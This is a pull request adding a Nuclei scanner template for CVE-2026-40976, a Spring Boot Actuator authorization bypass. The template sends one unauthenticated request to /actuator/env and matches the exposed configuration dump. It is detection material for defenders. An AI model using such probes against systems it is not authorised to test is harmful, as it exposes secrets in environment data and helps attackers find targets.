### PR TITLE
Add CVE-2026-40976 template

### DIFF
--- a/http/cves/2026/CVE-2026-40976.yaml
+++ b/http/cves/2026/CVE-2026-40976.yaml
@@ -1,0 +1,50 @@
+id: CVE-2026-40976
+
+info:
+  name: Spring Boot 4.0.0-4.0.5 - Actuator Authorization Bypass
+  author: str4k3r
+  severity: critical
+  description: |
+    Spring Boot's default web security filter chain fails to install any
+    authorization rule for Actuator endpoints when the application depends
+    on spring-boot-actuator-autoconfigure but not on the new spring-boot-health
+    module, has no custom Spring Security configuration, and relies on the
+    auto-configured default security. On an affected build every actuator
+    endpoint (env, beans, heapdump, etc.) is reachable without authentication
+    even though Spring Security is present and would otherwise require Basic
+    auth. Fixed in 4.0.6, which restores the missing authorization rule so
+    actuator endpoints require authentication by default again.
+  reference:
+    - https://spring.io/security/cve-2026-40976
+    - https://github.com/advisories/GHSA-8v8j-3hxp-93wr
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-40976
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
+    cvss-score: 9.1
+    cve-id: CVE-2026-40976
+    cwe-id: CWE-862
+  metadata:
+    verified: true
+    max-request: 1
+    product: spring-boot
+    vendor: vmware
+  tags: cve,cve2026,springboot,authbypass,unauth,actuator
+
+http:
+  - raw:
+      - |
+        GET /actuator/env HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"propertySources"'
+          - '"activeProfiles"'
+        condition: and
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
Adds a Nuclei template for **CVE-2026-40976**, a critical authorization-bypass vulnerability in Spring Boot 4.0.0-4.0.5 (fixed in 4.0.6, official vendor advisory at spring.io/security/cve-2026-40976, GHSA-8v8j-3hxp-93wr).

Spring Boot's default web security filter chain installs no authorization rule for Actuator endpoints when an application depends on `spring-boot-actuator-autoconfigure` but not on the (new in 4.0) `spring-boot-health` module, and has no custom Spring Security configuration of its own. On an affected build every actuator endpoint is reachable without authentication even though Spring Security is present and would otherwise require Basic auth.

The template requests `GET /actuator/env` and checks for an unauthenticated `200` with the actuator env-dump JSON shape (`propertySources`/`activeProfiles`) vs the expected `401` on a patched build.

Verified against a minimal reproduction app built for the exact vulnerable dependency combination described in the advisory, on pinned Spring Boot 4.0.5 (vulnerable) and 4.0.6 (fixed).